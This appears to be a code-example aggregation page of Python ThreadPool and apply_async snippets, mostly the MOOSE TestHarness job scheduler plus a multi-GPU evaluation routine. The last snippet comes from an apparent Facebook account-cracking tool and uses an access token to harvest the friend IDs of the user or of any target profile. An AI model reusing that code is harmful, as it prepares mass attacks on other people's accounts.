    Once all jobs have been scheduled, call .waitFinish() to wait until all jobs have
    finished.
    """

    @staticmethod
    def validParams():
        params = MooseObject.validParams()
        params.addRequiredParam('average_load',  64.0, "Average load to allow")
        params.addRequiredParam('max_processes', None, "Hard limit of maximum processes to use")
        params.addParam('min_reported_time', 10, "The minimum time elapsed before a job is reported as taking too long to run.")

        return params

    # This is what will be checked for when we look for valid schedulers
    IS_SCHEDULER = True

    def __init__(self, harness, params):
        MooseObject.__init__(self, harness, params)

        ## The test harness to run callbacks on
        self.harness = harness

        # Retrieve and store the TestHarness options for use in this object
        self.options = harness.getOptions()

        # The Scheduler class can be initialized with no "max_processes" argument and it'll default
        # to a soft limit. If, however, max_processes is passed, we'll treat it as a hard limit.
        # The difference is whether or not we allow single jobs to exceed the number of slots.
        if params['max_processes'] is None:
            self.available_slots = 1
            self.soft_limit = True
        else:
            self.available_slots = params['max_processes'] # hard limit
            self.soft_limit = False

        self.average_load = params['average_load']

        self.min_report_time = params['min_reported_time']

        # Initialize run_pool based on available slots
        self.run_pool = ThreadPool(processes=self.available_slots)

        # Initialize status_pool to only use 1 process (to prevent status messages from getting clobbered)
        self.status_pool = ThreadPool(processes=1)

        # Slot lock when processing resource allocations and modifying slots_in_use
        self.slot_lock = threading.Lock()

        # Job lock when modifying a jobs status
        self.activity_lock = threading.Lock()

        # Job count lock when modifying incoming/outgoing jobs
        self.job_count_lock = threading.Lock()

        # A combination of processors + threads (-j/-n) currently in use, that a job requires
        self.slots_in_use = 0

        # Count of jobs which need to complete
        self.job_count = 0

        # Set containing all submitted jobs
        self.__job_bank = set([])

        # Total running Job and Test failures encountered
        self.__failures = 0

        # Allow threads to set a global exception
        self.__error_state = False

        # Private set of jobs currently running
        self.__active_jobs = set([])

        # Jobs that are taking longer to finish than the allotted time are reported back early to inform
        # the user 'stuff' is still running. Jobs entering this set will not be reported again.
        self.jobs_reported = set([])

        # The last time the scheduler reported something
        self.last_reported_time = clock()

        # Sets of threading objects created by jobs entering and exiting the queues. When scheduler.waitFinish()
        # is called, and both thread pools are empty, the pools shut down, and the call to waitFinish() returns.
        self.__status_pool_lock = threading.Lock()
        self.__runner_pool_lock = threading.Lock()
        self.__status_pool_jobs = set([])
        self.__runner_pool_jobs = set([])

        # True when scheduler.waitFinish() is called. This alerts the scheduler, no more jobs are
        # to be scheduled. KeyboardInterrupts are then handled by the thread pools.
        self.__waiting = False

    def triggerErrorState(self):
        self.__error_state = True
        self.run_pool.close()
        self.status_pool.close()

    def killRemaining(self, keyboard=False):
        """ Method to kill running jobs """
        with self.activity_lock:
            for job in self.__active_jobs:
                job.killProcess()
        if keyboard:
            self.triggerErrorState()
            self.harness.keyboard_interrupt()
        else:
            self.triggerErrorState()

    def retrieveJobs(self):
        """ return all the jobs the scheduler was tasked to perform work for """
        return self.__job_bank

    def schedulerError(self):
        """ boolean if the scheduler prematurely exited """
        return self.__error_state and not self.maxFailures()

    def maxFailures(self):
        """ Boolean for hitting max failures """
        return ((self.options.valgrind_mode and self.__failures >= self.options.valgrind_max_fails)
                or self.__failures >= self.options.max_fails)

    def run(self, job):
        """ Call derived run method """
        return

    def notifyFinishedSchedulers(self):
        """ Notify derived schedulers we are finished """
        return

    def augmentJobs(self, Jobs):
        """
        Allow derived schedulers to augment Jobs before they perform work.
        Note: This occurs before we perform a job count sanity check. So
        any additions or subtractions to the number of jobs will result in
        an exception.
        """
        return

    def waitFinish(self):
        """
        Inform the Scheduler there are no further jobs to schedule.
        Return once all jobs have completed.
        """
        self.__waiting = True
        try:
            # wait until there is an error or all the queues are empty
            waiting_on_status_pool = True
            waiting_on_runner_pool = True

            while (waiting_on_status_pool or waiting_on_runner_pool) and self.job_count:

                if self.__error_state:
                    break

                with self.__status_pool_lock:
                    waiting_on_status_pool = sum(1 for x in self.__status_pool_jobs if not x.ready())
                with self.__runner_pool_lock:
                    waiting_on_runner_pool = sum(1 for x in self.__runner_pool_jobs if not x.ready())

                sleep(0.1)

            # Reporting sanity check
            if not self.__error_state and self.job_count:
                raise SchedulerError('Scheduler exiting with a different amount of work than it was tasked with!')

            if not self.__error_state:
                self.run_pool.close()
                self.run_pool.join()
                self.status_pool.close()
                self.status_pool.join()

            # allow derived schedulers to perform any exit routines
            self.notifyFinishedSchedulers()

        except KeyboardInterrupt:
            self.killRemaining(keyboard=True)

    def schedule(self, testers):
        """
        Generate and submit a group of testers to a thread pool queue for execution.
        """
        # If we are not to schedule any more jobs for some reason, return now
        if self.__error_state:
            return

        # Instance our job DAG, create jobs, and a private lock for this group of jobs (testers)
        Jobs = JobDAG(self.options)
        j_dag = Jobs.createJobs(testers)
        j_lock = threading.Lock()

        # Allow derived schedulers access to the jobs before they launch
        self.augmentJobs(Jobs)

        # job-count to tester-count sanity check
        if j_dag.size() != len(testers):
            raise SchedulerError('Scheduler was going to run a different number of testers than it received (something bad happened)!')

        # Final reporting job-count sanity check
        with self.job_count_lock:
            self.job_count += j_dag.size()

        # Store all processed jobs in the global job bank
        self.__job_bank.update(j_dag.topological_sort())

        # Launch these jobs to perform work
        self.queueJobs(Jobs, j_lock)

    def queueJobs(self, Jobs, j_lock):
        """
        Determine which queue jobs should enter. Finished jobs are placed in the status
        pool to be printed while all others are placed in the runner pool to perform work.

        A finished job will trigger a change to the Job DAG, which will allow additional
        jobs to become available and ready to enter the runner pool (dependency jobs).
        """
        with j_lock:
            concurrent_jobs = Jobs.getJobsAndAdvance()
            for job in concurrent_jobs:
                if job.isFinished():
                    if not self.status_pool._state:
                        with self.__status_pool_lock:
                            self.__status_pool_jobs.add(self.status_pool.apply_async(self.jobStatus, (job, Jobs, j_lock)))

                elif job.isHold():
                    if not self.run_pool._state:
                        with self.__runner_pool_lock:
                            job.setStatus(job.queued)
                            self.__runner_pool_jobs.add(self.run_pool.apply_async(self.runJob, (job, Jobs, j_lock)))

    def getLoad(self):
        """ Method to return current load average """
        loadAverage = 0.0
        try:
            loadAverage = os.getloadavg()[0]
        except AttributeError:
            pass      # getloadavg() not available in this implementation of os
        return loadAverage

    def satisfyLoad(self):
        """ Method for controlling load average """
        while self.slots_in_use > 1 and self.getLoad() >= self.average_load:
            sleep(1.0)

    def reserveSlots(self, job, j_lock):
        """
        Method which allocates resources to perform the job. Returns a bool indicating
        whether the job should be allowed to run based on available resources.
        """
        # comply with load average
        if self.options.load:
            self.satisfyLoad()

        with self.slot_lock:
            can_run = False
            if self.slots_in_use + job.getSlots() <= self.available_slots:
                can_run = True

            # Check for insufficient slots (soft limit)
            elif job.getSlots() > self.available_slots and self.soft_limit:
                job.addCaveats('OVERSIZED')
                can_run = True

            # Check for insufficient slots (hard limit; skip this job)
            elif job.getSlots() > self.available_slots and not self.soft_limit:
                job.addCaveats('insufficient slots')
                with j_lock:
                    job.setStatus(job.skip)

            if can_run:
                self.slots_in_use += job.getSlots()
        return can_run

    def handleTimeoutJob(self, job, j_lock):
        """ Handle jobs that have timed out """
        with j_lock:
            if job.isRunning():
                job.setStatus(job.crash, 'TIMEOUT')
                job.killProcess()

    def handleLongRunningJob(self, job, Jobs, j_lock):
        """ Handle jobs that have not reported in the alotted time """
        with self.__status_pool_lock:
            self.__status_pool_jobs.add(self.status_pool.apply_async(self.jobStatus, (job, Jobs, j_lock)))

    def jobStatus(self, job, Jobs, j_lock):
        """
        Instruct the TestHarness to print the status of job. This is a serial
        threaded operation, so as to prevent clobbering of text being printed
        to stdout.
        """
        if self.status_pool._state:
            return

        # It's possible the queue is just trying to empty
        try:
            job_was_running = False
            # Check if we should print due to inactivity
            with j_lock:
                if job.isRunning():
                    if job in self.jobs_reported:
                        return

                    # report inactivity if last reported time falls within tolerances
                    elif clock() - self.last_reported_time >= self.min_report_time:
                        job_was_running = True
                        job.addCaveats('FINISHED')

                        with self.activity_lock:
                            self.jobs_reported.add(job)

                    # TestHarness has not yet been inactive long enough to warrant a report
                    else:
                        # adjust the next report time based on delta of last report time
                        adjusted_interval = max(1, self.min_report_time - max(1, clock() - self.last_reported_time))
                        job.report_timer = threading.Timer(adjusted_interval,
                                                           self.handleLongRunningJob,
                                                           (job, Jobs, j_lock,))
                        job.report_timer.start()
                        return

            # Immediately following the Job lock, print the status
            self.harness.handleJobStatus(job)

            # Do last, to prevent premature thread pool closures
            with j_lock:
                tester = job.getTester()

                if not tester.isSilent():
                    self.last_reported_time = clock()

                if job.isFinished() and not job_was_running:
                    if tester.isFail():
                        self.__failures += 1

                    if self.maxFailures():
                        self.killRemaining()
                    else:
                        with self.job_count_lock:
                            self.job_count -= 1

        except Exception:
            print('statusWorker Exception: %s' % (traceback.format_exc()))
            self.killRemaining()

        except KeyboardInterrupt:
            self.killRemaining(keyboard=True)

    def runJob(self, job, Jobs, j_lock):
        """ Method the run_pool calls when an available thread becomes ready """
        # It's possible the queue is just trying to empty. Allow it to do so
        # without generating overhead
        if self.__error_state:
            return

        try:
            # see if we have enough slots to start this job
            if self.reserveSlots(job, j_lock):
                with j_lock:
                    job.setStatus(job.running)

                with self.activity_lock:
                    self.__active_jobs.add(job)

                tester = job.getTester()
                timeout_timer = threading.Timer(float(tester.getMaxTime()),
                                                self.handleTimeoutJob,
                                                (job, j_lock,))

                job.report_timer = threading.Timer(self.min_report_time,
                                                   self.handleLongRunningJob,
                                                   (job, Jobs, j_lock,))

                job.report_timer.start()
                timeout_timer.start()
                self.run(job) # Hand execution over to derived scheduler
                timeout_timer.cancel()

                # Recover worker count before attempting to queue more jobs
                with self.slot_lock:
                    self.slots_in_use = max(0, self.slots_in_use - job.getSlots())

                # Stop the long running timer
                job.report_timer.cancel()

                # All done
                with j_lock:
                    job.setStatus(job.finished)

                with self.activity_lock:
                    self.__active_jobs.remove(job)

            # Not enough slots to run the job...
            else:
                # ...currently, place back on hold before placing it back into the queue
                if not job.isFinished():
                    with j_lock:
                        job.setStatus(job.hold)
                    sleep(.1)

            # Job is done (or needs to re-enter the queue)
            self.queueJobs(Jobs, j_lock)

        except Exception:
            print('runWorker Exception: %s' % (traceback.format_exc()))
            self.killRemaining()

        except KeyboardInterrupt:
            self.killRemaining(keyboard=True)
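# --- Editor's usage sketch (not part of the TestHarness source) -----------------
# The Scheduler above pairs a multi-threaded runner pool with a single-threaded
# status pool, so work runs in parallel while status printing stays serialized,
# and then polls the async results in a waitFinish()-style loop. The stand-alone
# sketch below shows that pattern with hypothetical run_job/report_status stand-ins;
# it is an illustration of the technique, not the TestHarness API.
from multiprocessing.pool import ThreadPool
from time import sleep

status_pool = ThreadPool(processes=1)    # one thread -> status lines never interleave
run_pool = ThreadPool(processes=4)       # sized to the available job slots

def report_status(name, state):
    print('%s: %s' % (name, state))

def run_job(name):
    sleep(0.1)                           # stand-in for real work
    status_pool.apply_async(report_status, (name, 'finished'))

results = [run_pool.apply_async(run_job, (n,)) for n in ('job_a', 'job_b', 'job_c')]

# waitFinish()-style polling: spin until every submitted job reports ready()
while any(not r.ready() for r in results):
    sleep(0.1)

run_pool.close()
run_pool.join()
status_pool.close()
status_pool.join()
# --------------------------------------------------------------------------------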
Exemple #45
class Scheduler(MooseObject):
    """
    Base class for handling jobs asynchronously. To use this class, call .schedule()
    and supply a list of testers to schedule. Each group of testers supplied will begin
    running immediately.

    Syntax:
       .schedule([list of tester objects])

    A list of testers will be added to a queue and begin calling their derived run method.
    You can continue to add more testers to the queue in this fashion.

    Once you schedule all the testers you wish to test, call .waitFinish() to wait until
    all testers have finished.

    """

    @staticmethod
    def validParams():
        params = MooseObject.validParams()
        params.addRequiredParam('average_load',  64.0, "Average load to allow")
        params.addRequiredParam('max_processes', None, "Hard limit of maximum processes to use")

        return params

    def __init__(self, harness, params):
        MooseObject.__init__(self, harness, params)

        ## The test harness to run callbacks on
        self.harness = harness

        # Retrieve and store the TestHarness options for use in this object
        self.options = harness.getOptions()

        # The Scheduler class can be initialized with no "max_processes" argument, and it'll default
        # to a soft limit. If, however, a max_processes is passed, we'll treat it as a hard limit.
        # The difference is whether or not we allow single jobs to exceed the number of slots.
        if params['max_processes'] is None:
            self.available_slots = 1
            self.soft_limit = True
        else:
            self.available_slots = params['max_processes'] # hard limit
            self.soft_limit = False

        # Requested average load level to stay below
        self.average_load = params['average_load']

        # The time the status queue reported no activity to the TestHarness
        self.last_reported = clock()

        # A set containing jobs that have been reported
        self.jobs_reported = set([])

        # Initialize run_pool based on available slots
        self.run_pool = ThreadPool(processes=self.available_slots)

        # Initialize status_pool to only use 1 process (to prevent status messages from getting clobbered)
        self.status_pool = ThreadPool(processes=1)

        # Slot Lock when processing resource allocations
        self.slot_lock = threading.Lock()

        # DAG Lock when processing the DAG
        self.dag_lock = threading.Lock()

        # Workers in use (single job might request multiple slots)
        self.slots_in_use = 0

        # Jobs waiting to finish (includes actively running jobs)
        self.job_queue_count = 0

        # Set containing our TesterData containers. We use this in the event of a KeyboardInterrupt to
        # iterate over and kill any subprocesses
        self.tester_datas = set([])

    def killRemaining(self):
        """
        Method to kill any running subprocess started by the Scheduler. This also
        closes the status pool to prevent further statuses from printing to the
        screen.
        """
        self.run_pool.close()
        self.status_pool.close()

        for tester_data in self.tester_datas:
            tester_data.killProcess()
        self.job_queue_count = 0

    def run(self, job_container):
        """ Call derived run method """
        return

    def skipPrereqs(self):
        """
        Method to return boolean to skip dependency prerequisites checks.
        """
        if self.options.ignored_caveats:
            if 'all' in self.options.ignored_caveats or 'prereq' in self.options.ignored_caveats:
                return True
        return False

    def processDownstreamTests(self, job_container):
        """
        Method to discover and delete downstream jobs due to the supplied job failing.
        """
        with self.dag_lock:
            failed_job_containers = set([])
            tester = job_container.getTester()
            job_dag = job_container.getDAG()
            if (tester.isFinished() and not tester.didPass() and not tester.isSilent() and not self.skipPrereqs()) \
                or (self.options.dry_run and not tester.isSilent()):

                # Ask the DAG to delete and return the downstream jobs associated with this job
                failed_job_containers.update(job_dag.delete_downstreams(job_container))

            for failed_job in failed_job_containers:
                tester = failed_job.getTester()
                tester.setStatus('skipped dependency', tester.bucket_skip)

        return failed_job_containers

    def buildDAG(self, job_container_dict, job_dag):
        """
        Build the DAG and catch any failures.
        """

        failed_or_skipped_testers = set([])

        # Create DAG independent nodes
        for tester_name, job_container in job_container_dict.iteritems():
            tester = job_container.getTester()

            # If this tester is not runnable, continue to the next tester
            if tester.getRunnable(self.options):

                job_dag.add_node_if_not_exists(job_container)

            else:
                failed_or_skipped_testers.add(tester)
                continue

        # Create edge nodes
        for tester_name, job_container in job_container_dict.iteritems():
            tester = job_container.getTester()

            # Add the prereq node and edges
            for prereq in tester.getPrereqs():

                try:
                    # Try to produce a KeyError and capture an unknown dependency
                    job_container_dict[prereq]

                    # Try to produce either a cyclic or skipped dependency error using the DAG's
                    # built-in exception methods
                    job_dag.add_edge(job_container_dict[prereq], job_container)

                # Skipped Dependencies
                except dag.DAGEdgeIndError:
                    if not self.skipPrereqs():
                        tester.setStatus('skipped dependency', tester.bucket_skip)
                        failed_or_skipped_testers.add(tester)

                    # Add the parent node / dependency edge to create a functional DAG now that we have caught
                    # the skipped dependency (needed for discovering race conditions later on)
                    job_dag.add_node_if_not_exists(job_container_dict[prereq])
                    job_dag.add_edge(job_container_dict[prereq], job_container)

                # Cyclic Failure
                except dag.DAGValidationError:
                    tester.setStatus('Cyclic or Invalid Dependency Detected!', tester.bucket_fail)
                    failed_or_skipped_testers.add(tester)

                # Unknown Dependency Failure
                except KeyError:
                    tester.setStatus('unknown dependency', tester.bucket_fail)
                    failed_or_skipped_testers.add(tester)

                # Skipped/Silent/Deleted Testers fall into this category, caused by 'job_container' being skipped
                # during the first iteration above
                except dag.DAGEdgeDepError:
                    pass

        # With a working DAG created above (even a partial one), discover race conditions with remaining runnable
        # testers.
        failed_or_skipped_testers.update(self.checkRaceConditions(job_dag))

        return failed_or_skipped_testers

    def checkRaceConditions(self, dag_object):
        """
        Return a set of failing testers exhibiting race conditions with their
        output file.
        """
        failed_or_skipped_testers = set([])

        # clone the dag so we can operate destructively on the cloned dag
        dag_clone = dag_object.clone()

        while dag_clone.size():
            output_files_in_dir = set()

            # Get a list of concurrent job containers
            concurrent_jobs = dag_clone.ind_nodes()

            for job_container in concurrent_jobs:
                tester = job_container.getTester()
                output_files = tester.getOutputFiles()

                # check if we have colliding output files
                if len(output_files_in_dir.intersection(set(output_files))):

                    # Fail this concurrent group of testers
                    for this_job in concurrent_jobs:
                        tester = this_job.getTester()
                        tester.setStatus('OUTFILE RACE CONDITION', tester.bucket_fail)
                        failed_or_skipped_testers.add(tester)

                    # collisions detected, move on to the next set
                    break

                output_files_in_dir.update(output_files)

            # Delete this group of job containers and allow the loop to continue
            for job_container in concurrent_jobs:
                dag_clone.delete_node(job_container)

        return failed_or_skipped_testers

    def schedule(self, testers):
        """
        Schedule supplied list of testers for execution.
        """
        # If any threads caused an exception, we have already closed down the queue and must
        # not schedule any more jobs
        if self.run_pool._state:
            return

        # Instance the DAG class so we can share it amongst all the TesterData containers
        job_dag = dag.DAG()

        non_runnable_jobs = set([])
        name_to_job_container = {}

        # Increment our simple queue count with the number of testers the scheduler received
        with self.slot_lock:
            self.job_queue_count += len(testers)

        # Create a local dictionary of tester names to job containers, and add each container to a
        # set. We will use this set as a way to gain access to their methods later.
        for tester in testers:
            name_to_job_container[tester.getTestName()] = TesterData(tester, job_dag, self.options)
            self.tester_datas.add(name_to_job_container[tester.getTestName()])

        # Populate job_dag with testers. This method will also return any testers which caused failures
        # while building the DAG.
        skipped_or_failed_testers = self.buildDAG(name_to_job_container, job_dag)

        # Create a set of failing job containers
        for failed_tester in skipped_or_failed_testers:
            non_runnable_jobs.add(name_to_job_container[failed_tester.getTestName()])

        # Iterate over the jobs in our non_runnable_jobs and handle any downstream jobs affected by
        # 'job'. These will be our 'skipped dependency' tests.
        for job in non_runnable_jobs.copy():
            additionally_skipped = self.processDownstreamTests(job)
            non_runnable_jobs.update(additionally_skipped)
            job_dag.delete_node_if_exists(job)

        # Get a count of all the items still in the DAG. These will be the jobs that ultimately are queued
        runnable_jobs = job_dag.size()

        # Make sure we didn't drop a tester somehow
        if len(non_runnable_jobs) + runnable_jobs != len(testers):
            raise SchedulerError('Runnable tests plus skipped tests do not match the total scheduled test count!')

        # Assign a status thread to begin work on any skipped/failed jobs
        self.queueJobs(status_jobs=non_runnable_jobs)

        # Build our list of runnable jobs and set the tester's status to queued
        job_list = []
        if runnable_jobs:
            job_list = job_dag.ind_nodes()
            for job_container in job_list:
                tester = job_container.getTester()
                tester.setStatus('QUEUED', tester.bucket_pending)

        # Queue runnable jobs
        self.queueJobs(run_jobs=job_list)

    def waitFinish(self):
        """
        Block while the job queue is not empty. Once empty, this method will begin closing down
        the thread pools and perform a join. Once the last thread exits, we return from this
        method.

        There are two thread pools in play; the Tester pool which is performing all the tests,
        and the Status pool which is handling the printing of tester statuses. Because the
        Status pool will always have the last item needing to be 'printed', we close and join
        the Tester pool first, and then we do the same to the Status pool.
        """
        while self.job_queue_count > 0:
            sleep(0.5)

        self.run_pool.close()
        self.run_pool.join()
        self.status_pool.close()
        self.status_pool.join()

    def handleLongRunningJobs(self, job_container):
        """ Handle jobs that have not reported in alotted time """
        if job_container not in self.jobs_reported:
            tester = job_container.getTester()
            tester.setStatus('RUNNING...', tester.bucket_pending)
            self.queueJobs(status_jobs=[job_container])

            # Restart the reporting timer for this job
            job_container.report_timer = threading.Timer(float(tester.getMinReportTime()),
                                                         self.handleLongRunningJobs,
                                                         (job_container,))

            job_container.report_timer.start()

    def handleTimeoutJobs(self, job_container):
        """ Handle jobs that have timed out """
        tester = job_container.getTester()
        tester.setStatus('TIMEOUT', tester.bucket_fail)
        job_container.killProcess()

    def getLoad(self):
        """ Method to return current load average """
        loadAverage = 0.0
        try:
            loadAverage = os.getloadavg()[0]
        except AttributeError:
            pass      # getloadavg() not available in this implementation of os
        return loadAverage

    def satisfyLoad(self):
        """ Method for controlling load average """
        while self.slots_in_use > 1 and self.getLoad() >= self.average_load:
            sleep(1.0)

    def reserveSlots(self, job_container):
        """
        Method which allocates resources to perform the job. Returns a bool indicating
        whether the job should be allowed to run.
        """
        tester = job_container.getTester()

        # comply with load average
        if self.options.load:
            self.satisfyLoad()

        with self.slot_lock:
            can_run = False
            if self.slots_in_use + tester.getProcs(self.options) <= self.available_slots:
                can_run = True

            # Check for insufficient slots -soft limit
            # TODO: Create a unit test for this case
            elif tester.getProcs(self.options) > self.available_slots and self.soft_limit:
                tester.specs.addParam('caveats', ['OVERSIZED'], "")
                can_run = True

            # Check for insufficient slots -hard limit (skip this job)
            # TODO: Create a unit test for this case
            elif tester.getProcs(self.options) > self.available_slots and not self.soft_limit:
                tester.setStatus('insufficient slots', tester.bucket_skip)
                can_run = False

            if can_run:
                self.slots_in_use += tester.getProcs(self.options)

        return can_run

    def getNextJobGroup(self, job_container):
        """
        Method to delete the current finished job from the DAG and return the next
        list of individually runnable jobs.
        """
        with self.dag_lock:
            job_dag = job_container.getDAG()
            next_job_list = []

            # Delete this job from the shared DAG
            job_dag.delete_node(job_container)

            # Get next available job list
            concurrent_jobs = job_dag.ind_nodes()

            for next_job_container in concurrent_jobs:
                queued_tester = next_job_container.getTester()

                # Verify this job is not already running/pending/skipped
                if queued_tester.isInitialized():
                    # Set this next new job to pending so as to prevent this job from being launched a second time
                    queued_tester.setStatus('QUEUED', queued_tester.bucket_pending)
                    next_job_list.append(next_job_container)

        return next_job_list

    def queueJobs(self, status_jobs=[], run_jobs=[]):
        """
        Method to control which thread pool jobs enter.
        Syntax:

           To have a job(s) display its current status to the screen:
           .queueJobs(status_jobs=[job_container_list])

           To begin running job(s):
           .queueJobs(run_jobs=[job_container_list])

        """
        for job_container in run_jobs:
            if not self.run_pool._state:
                self.run_pool.apply_async(self.runWorker, (job_container,))

        for job_container in status_jobs:
            if not self.status_pool._state:
                self.status_pool.apply_async(self.statusWorker, (job_container,))

    def statusWorker(self, job_container):
        """ Method the status_pool calls when an available thread becomes ready """
        # Wrap entire statusWorker thread inside a try/exception to catch thread errors
        try:
            tester = job_container.getTester()

            # If the job has been running for a long period of time and we have not reported
            # this same job already, report it now.
            if tester.isPending():
                if clock() - self.last_reported >= float(tester.getMinReportTime()) and job_container not in self.jobs_reported:
                    # Inform the TestHarness of a long running test (RUNNING...)
                    self.harness.handleTestStatus(job_container)

                    # ...And then set the finished caveat now that the running status has printed
                    tester.specs.addParam('caveats', ['FINISHED'], "")

                    # Add this job to the reported container so it does not happen again
                    self.jobs_reported.add(job_container)

                # Job is 'Pending', but is under the threshold to be reported (return now so
                # the last_reported time does not get updated). This ensures that if nothing
                # has happened between now and the next occurrence of our thread timer event,
                # we do report it.
                else:
                    return

            else:
                # All other statuses are sent unmolested
                self.harness.handleTestStatus(job_container)

            # Decrement the job queue count now that this job has finished
            if tester.isFinished():
                with self.slot_lock:
                    self.job_queue_count -= 1

            # Record current reported time only if it is an activity the user will see
            if not tester.isSilent() or not tester.isDeleted():
                self.last_reported = clock()

        except Exception as e:
            print 'statusWorker Exception: %s' % (e)
            self.killRemaining()

    def runWorker(self, job_container):
        """ Method the run_pool calls when an available thread becomes ready """
        # Wrap the entire runWorker thread inside a try/exception to catch thread errors
        try:
            tester = job_container.getTester()
            # Check if there are enough resources to run this job
            if self.reserveSlots(job_container):

                # Start long running timer
                job_container.report_timer = threading.Timer(float(tester.getMinReportTime()),
                                                             self.handleLongRunningJobs,
                                                             (job_container,))
                job_container.report_timer.start()

                # Start timeout timer
                timeout_timer = threading.Timer(float(tester.getMaxTime()),
                                          self.handleTimeoutJobs,
                                          (job_container,))
                timeout_timer.start()

                # Call the derived run method
                self.run(job_container)

                # Stop timers now that the job has finished on its own
                job_container.report_timer.cancel()
                timeout_timer.cancel()

                # Derived run needs to set a non-pending status of some sort.
                if tester.isPending():
                    raise SchedulerError('Derived Scheduler can not return a pending status!')

                # Determine if this job creates any skipped dependencies (if it failed), and send
                # this new list of jobs to the status queue to be printed.
                possibly_skipped_job_containers = self.processDownstreamTests(job_container)
                possibly_skipped_job_containers.add(job_container)
                self.queueJobs(status_jobs=possibly_skipped_job_containers)

                # Get next job list
                next_job_group = self.getNextJobGroup(job_container)

                # Recover worker count before attempting to queue more jobs
                with self.slot_lock:
                    self.slots_in_use = max(0, self.slots_in_use - tester.getProcs(self.options))

                # Queue this new batch of runnable jobs
                self.queueJobs(run_jobs=next_job_group)

            # Not enough slots to run the job, currently
            else:
                # There will never be enough slots to run this job (insufficient slots)
                if tester.isFinished():
                    failed_downstream = self.processDownstreamTests(job_container)
                    failed_downstream.add(job_container)
                    self.queueJobs(status_jobs=failed_downstream)

                # There are no available slots, currently. Place back in queue, and sleep for a bit
                else:
                    self.queueJobs(run_jobs=[job_container])
                    sleep(0.3)

        except Exception as e:
            print 'runWorker Exception: %s' % (e)
            self.killRemaining()
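# --- Editor's sketch of the output-file race check (hypothetical, not the dag module) ---
# checkRaceConditions() above walks each group of concurrently runnable jobs and fails the
# whole group when two jobs declare the same output file. The stand-alone function below
# illustrates that set-intersection idea over plain (name, output_files) tuples; it is a
# simplified assumption-based sketch, not the Scheduler's actual DAG traversal.
def find_output_collisions(levels):
    colliding_groups = []
    for group in levels:                      # each group = jobs that could run concurrently
        seen = set()
        for name, output_files in group:
            if seen.intersection(output_files):
                # any overlap condemns the whole concurrent group
                colliding_groups.append([job_name for job_name, _ in group])
                break
            seen.update(output_files)
    return colliding_groups

# Two concurrent jobs writing the same file collide; independent outputs do not.
levels = [
    [('test_a', {'out.e'}), ('test_b', {'out.e'})],
    [('test_c', {'c.csv'}), ('test_d', {'d.csv'})],
]
print(find_output_collisions(levels))         # -> [['test_a', 'test_b']]
# -----------------------------------------------------------------------------------------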
Exemple #46
def pred_eval_multiprocess(gpu_num,
                           key_predictors,
                           cur_predictors,
                           test_datas,
                           imdb,
                           cfg,
                           vis=False,
                           thresh=1e-3,
                           logger=None,
                           ignore_cache=True):

    if cfg.TEST.SEQ_NMS == False:
        if gpu_num == 1:
            res = [
                pred_eval(0, key_predictors[0], cur_predictors[0],
                          test_datas[0], imdb, cfg, vis, thresh, logger,
                          ignore_cache),
            ]
        else:
            from multiprocessing.pool import ThreadPool as Pool
            pool = Pool(processes=gpu_num)
            multiple_results = [
                pool.apply_async(pred_eval,
                                 args=(i, key_predictors[i], cur_predictors[i],
                                       test_datas[i], imdb, cfg, vis, thresh,
                                       logger, ignore_cache))
                for i in range(gpu_num)
            ]
            pool.close()
            pool.join()
            res = [res.get() for res in multiple_results]
        info_str = imdb.evaluate_detections_multiprocess(res)

    else:
        if gpu_num == 1:
            res = [
                pred_eval(0, key_predictors[0], cur_predictors[0],
                          test_datas[0], imdb, cfg, vis, thresh, logger,
                          ignore_cache),
            ]

        else:
            from multiprocessing.pool import ThreadPool as Pool

            pool = Pool(processes=gpu_num)
            multiple_results = [
                pool.apply_async(pred_eval,
                                 args=(i, key_predictors[i], cur_predictors[i],
                                       test_datas[i], imdb, cfg, vis, thresh,
                                       logger, ignore_cache))
                for i in range(gpu_num)
            ]
            pool.close()
            pool.join()
            res = [res.get() for res in multiple_results]

        from multiprocessing import Pool
        pool = Pool(processes=gpu_num)
        jobs = []
        res = []
        for i in range(gpu_num):
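            # Note: apply_async here appears to be a module-level helper defined elsewhere
            # in this codebase (presumably wrapping pool.apply_async); that is an assumption,
            # as the helper is not shown in this snippet.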
            job = apply_async(pool, pred_eval_seqnms, (i, imdb))
            jobs.append(job)
        for job in jobs:
            res.append(job.get())
        info_str = imdb.do_python_eval_gen(gpu_num)
    if logger:
        logger.info('evaluate detections: \n{}'.format(info_str))
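# --- Editor's sketch of the per-GPU fan-out used above (hypothetical work function) ---
# pred_eval_multiprocess() submits one pred_eval per GPU with apply_async, closes and joins
# the pool, then collects results with .get(). The minimal sketch below shows the same
# submit / close / join / get pattern; evaluate_on_gpu is a made-up stand-in for pred_eval.
from multiprocessing.pool import ThreadPool

def evaluate_on_gpu(gpu_id):
    return {'gpu': gpu_id, 'detections': gpu_id * 10}   # pretend per-GPU result

gpu_num = 4
pool = ThreadPool(processes=gpu_num)
async_results = [pool.apply_async(evaluate_on_gpu, args=(i,)) for i in range(gpu_num)]
pool.close()                                  # no more tasks will be submitted
pool.join()                                   # block until every worker finishes
res = [r.get() for r in async_results]        # .get() re-raises any worker exception
print(res)
# ---------------------------------------------------------------------------------------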
Exemple #47
def pilih_super():
	peak = raw_input("\n\033[1;97mChoose an Option>>> \033[1;97m")
	if peak =="":
		print "\x1b[1;91mFill in correctly"
		pilih_super()
	elif peak =="1":
		os.system('clear')
		print logo
		print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mXpartxn-rixo\033[1;95m♡──────────•◈•──────────♡"
		jalan('\033[1;93mGetting IDs \033[1;97m...')
		r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
		z = json.loads(r.text)
		for s in z['data']:
			id.append(s['id'])
	elif peak =="2":
		os.system('clear')
		print logo
		idt = raw_input("\033[1;96m[♡] \033[1;92mEnter ID\033[1;93m: \033[1;97m")
		print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mXpartxn-rixo\033[1;95m♡──────────•◈•──────────╯♡"
		try:
			jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
			op = json.loads(jok.text)
			print"\033[1;93mName\033[1;93m:\033[1;97m "+op["name"]
		except KeyError:
			print"\x1b[1;92mID Not Found!"
			raw_input("\n\033[1;96m[\033[1;94mBack\033[1;96m]")
			super()
		print"\033[1;93mGetting IDs\033[1;93m..."
		r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
		z = json.loads(r.text)
		for i in z['data']:
			id.append(i['id'])
	elif peak =="0":
		menu()
	else:
		print "\x1b[1;91mFill in correctly"
		pilih_super()
	
	print "\033[1;91mTotal IDs\033[1;93m: \033[1;94m"+str(len(id))
